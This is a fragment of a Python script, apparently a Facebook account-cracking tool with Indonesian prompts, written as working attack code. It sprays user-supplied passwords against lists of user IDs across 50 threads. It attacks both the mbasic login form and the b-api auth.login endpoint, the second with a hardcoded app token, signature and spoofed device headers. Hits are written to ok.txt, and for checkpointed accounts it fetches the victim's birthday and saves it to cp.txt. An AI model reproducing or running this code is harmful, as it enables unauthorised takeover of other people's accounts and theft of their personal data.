	#print("\n \033[0;97m[\033[0;93m*\033[0;97m] Crack With Password : \033[0;91m%s"%(pw))
	print ('')
	if len(pw) ==0:
		exit(" \033[0;97m[\033[0;91m!\033[0;97m] Don't Be Empty")
	
	def main(user):
		global loop, token
		#sys.stdout.write('\r \033[0;97m[\033[0;93m*\033[0;97m] Crack %s/OK:%s CP:%s ' % (loop, len(ok), len(cp))
		sys.stdout.write('\r\033[1;97m [\033[1;92m%s\033[1;97m]' %(loop)
		); sys.stdout.flush()
		try:os.mkdir("results")
		except OSError:pass
		uid,name=user.split("[-]")
		ss = name.split(" ")
		try:
			os.mkdir('results')
		except OSError:
			pass
		try:
			for asu in pw.split(","):
				ua = 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUI MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 Instagram 38.0.0.13.95 Android (24/7.0; 480dpi; 1080x1920; Xiaomi/xiaomi; Redmi Note 4X; mido; qcom; ru_RU; 99640911)'
				rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': asu, 'login': 'submit'}, headers={'user-agent': ua})
				xo = rex.content
				if 'mbasic_logout_button' in xo or 'save-device' in xo:
					print('\r [OK] '+uid+ '|' + asu + '       ')
					ok.append(uid+'|'+asu)
					save = open('ok.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
				if 'checkpoint' in xo:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r  \033[0;93m[CP] ' +uid+ '|' + asu + '|' + ttl)
						cp.append(uid+'|'+asu+'|'+ttl)
						save = open('cp.txt','a') 
						save.write('  * --> '+str(uid)+'|'+str(asu)+'|'+ttl+'\n')
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print('\r  [CP] ' +uid+ '|' + asu + '       ')
					cp.append(uid+'|'+asu)
					save = open('cp.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
			
			loop += 1
		except:
			pass
	p = ThreadPool(50)
	p.map(main, id)
	print ("\n \033[0;97m[\033[0;96m#\033[0;97m] Selesai")
	ik = raw_input("\n \033[0;97m[*] Crack Lagi? Y/t : ")
	if ik == "Y" or ik == "y":
		manual()
	exit()
	
def manuapi():
	pw = raw_input(" \033[0;97m[\033[0;92m*\033[0;97m] Set Password : ")
	#print("\n \033[0;97m[\033[0;93m*\033[0;97m] Crack With Password : \033[0;91m%s"%(pw))
	print ('')
	if len(pw) ==0:
		exit(" \033[0;97m[\033[0;91m!\033[0;97m] Don't Be Empty")
	
	def main(user):
		global loop, token
		#sys.stdout.write('\r \033[0;97m[\033[0;93m*\033[0;97m] Crack %s/OK:%s CP:%s ' % (loop, len(ok), len(cp))
		sys.stdout.write('\r\033[1;97m [\033[1;92m%s\033[1;97m]' %(loop)
		); sys.stdout.flush()
		try:os.mkdir("results")
		except OSError:pass
		uid,name=user.split("[-]")
		ss = name.split(" ")
		try:
			os.mkdir('results')
		except OSError:
			pass
		try:
			for asu in pw.split(","):
				ua = 'Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/197.0.0.46.98;]'
				headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 
               'x-fb-net-hni': str(random.randint(20000, 40000)), 
               'x-fb-connection-quality': 'EXCELLENT', 
               'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 
               'user-agent': ua, 
               'content-type': 'application/x-www-form-urlencoded', 
               'x-fb-http-engine': 'Liger'}
				ses=requests.Session()
				api="https://b-api.facebook.com/method/auth.login"
				param={"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32","format": "JSON","sdk_version": "2","email":uid,"locale": "en_US","password":asu,"sdk": "ios","generate_session_cookies": "1","sig": "3f555f99fb61fcd7aa0c44f58f522ef6"}
				send=ses.get(api,params=param, headers=headers_)
				if "session_key" in send.text and "EAAA" in send.text:
					print('\r [OK] '+uid+ '|' + asu + '       ')
					ok.append(uid+'|'+asu)
					save = open('ok.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
				elif "www.facebook.com" in send.json()["error_msg"]:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r  \033[0;93m[CP] ' +uid+ '|' + asu + '|' + ttl)
						cp.append(uid+'|'+asu+'|'+ttl)
						save = open('cp.txt','a') 
						save.write('  * --> '+str(uid)+'|'+str(asu)+'|'+ttl+'\n')
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print('\r  [CP] ' +uid+ '|' + asu + '       ')
					cp.append(uid+'|'+asu)
					save = open('cp.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
			
			loop += 1
		except:
			pass
	p = ThreadPool(50)
	p.map(main, id)
	print ("\n \033[0;97m[\033[0;96m#\033[0;97m] Selesai")
	ik = raw_input("\n \033[0;97m[*] Crack Lagi? Y/t : ")
	if ik == "Y" or ik == "y":
		manual()
	exit()
						
						
						
			
				
				
				
				

if __name__=='__main__':
	token = open('login.txt', 'r').read()
	crack()